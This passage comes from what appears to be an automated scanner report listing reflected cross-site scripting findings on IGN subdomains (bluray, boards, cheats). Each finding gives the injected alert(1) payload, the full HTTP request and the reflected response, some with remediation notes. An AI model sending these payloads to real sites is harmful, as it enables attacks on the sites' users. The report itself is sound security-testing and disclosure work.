Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15004-580806984-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:27 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041087804v-1n-12mc+1297041087804mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=1n5f961d6asqp;Path=/indx
Set-Cookie: JSESSIONID=5ssan89s25ovo;Path=/indx
Content-Length: 140589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/index/release.html?b279d"><script>alert(1)</script>bce7cd5b7fe=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.66. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e16e1"-alert(1)-"bdf7753c49f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?e16e1"-alert(1)-"bdf7753c49f=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-811178274-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041091153v-1n-12mc+1297041091153mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
of _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://bluray.ign.com/index/reviews.html?e16e1"-alert(1)-"bdf7753c49f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.67. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff20"><script>alert(1)</script>c3a11347216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?4ff20"><script>alert(1)</script>c3a11347216=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26185-1640144759-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041084196v-1n-12mc+1297041084196mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/index/reviews.html?4ff20"><script>alert(1)</script>c3a11347216=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.68. http://boards.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a633f"style%3d"x%3aexpression(alert(1))"c7f6defbe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a633f"style="x:expression(alert(1))"c7f6defbe5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a633f"style%3d"x%3aexpression(alert(1))"c7f6defbe5b=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:37 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:37 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=-1; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

IGN Board
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/?a633f"style="x:expression(alert(1))"c7f6defbe5b=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.69. http://boards.ign.com/comics_boards/c5025 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /comics_boards/c5025

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 144d2"style%3d"x%3aexpression(alert(1))"dc6fedb49ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 144d2"style="x:expression(alert(1))"dc6fedb49ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /comics_boards/c5025?144d2"style%3d"x%3aexpression(alert(1))"dc6fedb49ed=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:45 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:45 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5025; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 70922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Comics Boards -
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/comics_boards/c5025?144d2"style="x:expression(alert(1))"dc6fedb49ed=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.70. http://boards.ign.com/game_help_community_board/b5143/p1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /game_help_community_board/b5143/p1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a579"style%3d"x%3aexpression(alert(1))"dd2c3a9596f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a579"style="x:expression(alert(1))"dd2c3a9596f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /game_help_community_board/b5143/p1?6a579"style%3d"x%3aexpression(alert(1))"dd2c3a9596f=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:47 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5143=665860307; expires=Tue, 07-Feb-2012 01:11:47 GMT; path=/; HttpOnly
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5143=665860307; expires=Tue, 07-Feb-2012 01:11:47 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5033; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 108756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Game Help Commu
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/game_help_community_board/b5143/p1?6a579"style="x:expression(alert(1))"dd2c3a9596f=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.71. http://boards.ign.com/general_game_help_board/b5030/p1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /general_game_help_board/b5030/p1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb1e"style%3d"x%3aexpression(alert(1))"4e68eab179b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fb1e"style="x:expression(alert(1))"4e68eab179b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /general_game_help_board/b5030/p1?7fb1e"style%3d"x%3aexpression(alert(1))"4e68eab179b=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5030=665860304; expires=Tue, 07-Feb-2012 01:11:44 GMT; path=/; HttpOnly
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False&brd5030=665860304; expires=Tue, 07-Feb-2012 01:11:44 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5033; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 90419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
General Game He
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/general_game_help_board/b5030/p1?7fb1e"style="x:expression(alert(1))"4e68eab179b=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.72. http://boards.ign.com/movies/c5017 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /movies/c5017

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75b7"style%3d"x%3aexpression(alert(1))"f3c2560ab6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d75b7"style="x:expression(alert(1))"f3c2560ab6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /movies/c5017?d75b7"style%3d"x%3aexpression(alert(1))"f3c2560ab6a=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:43 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:43 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5017; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 68578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Movies - IGN Bo
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/movies/c5017?d75b7"style="x:expression(alert(1))"f3c2560ab6a=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.73. http://boards.ign.com/nintendo_wii_ds_boards/c5062 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /nintendo_wii_ds_boards/c5062

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab04"style%3d"x%3aexpression(alert(1))"24a467ebcbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eab04"style="x:expression(alert(1))"24a467ebcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /nintendo_wii_ds_boards/c5062?eab04"style%3d"x%3aexpression(alert(1))"24a467ebcbc=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:37 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5062; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 77313


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Nintendo Wii &a
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/nintendo_wii_ds_boards/c5062?eab04"style="x:expression(alert(1))"24a467ebcbc=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.74. http://boards.ign.com/pc_games_and_more/c5060 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /pc_games_and_more/c5060

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 771e2"style%3d"x%3aexpression(alert(1))"7f50f9fa2d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 771e2"style="x:expression(alert(1))"7f50f9fa2d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pc_games_and_more/c5060?771e2"style%3d"x%3aexpression(alert(1))"7f50f9fa2d2=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:33 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:33 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5060; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 76348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
PC Games and Mo
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/pc_games_and_more/c5060?771e2"style="x:expression(alert(1))"7f50f9fa2d2=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.75. http://boards.ign.com/playstation_boards/c5058 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /playstation_boards/c5058

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88ff"style%3d"x%3aexpression(alert(1))"3782c71c347 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b88ff"style="x:expression(alert(1))"3782c71c347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /playstation_boards/c5058?b88ff"style%3d"x%3aexpression(alert(1))"3782c71c347=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:42 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5058; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 81438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
PlayStation Boa
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/playstation_boards/c5058?b88ff"style="x:expression(alert(1))"3782c71c347=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.76. http://boards.ign.com/tv/c5026 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /tv/c5026

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5659d"style%3d"x%3aexpression(alert(1))"d0b714997f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5659d"style="x:expression(alert(1))"d0b714997f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tv/c5026?5659d"style%3d"x%3aexpression(alert(1))"d0b714997f=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:43 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:43 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5026; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 67934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
TV - IGN Boards
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/tv/c5026?5659d"style="x:expression(alert(1))"d0b714997f=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.77. http://boards.ign.com/xbox_360_boards/c5056 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /xbox_360_boards/c5056

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85096"style%3d"x%3aexpression(alert(1))"83a44cb2b94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85096"style="x:expression(alert(1))"83a44cb2b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /xbox_360_boards/c5056?85096"style%3d"x%3aexpression(alert(1))"83a44cb2b94=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:36 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5056; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 74412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Xbox 360 Boards
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/xbox_360_boards/c5056?85096"style="x:expression(alert(1))"83a44cb2b94=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.78. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cd43"><script>alert(1)</script>bc6f5a7fbe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7cd43"><script>alert(1)</script>bc6f5a7fbe9=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 00:58:46 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18740-885768600-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 00:58:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 568774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/?7cd43"><script>alert(1)</script>bc6f5a7fbe9=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.79. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 778c0"-alert(1)-"0daba286c40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

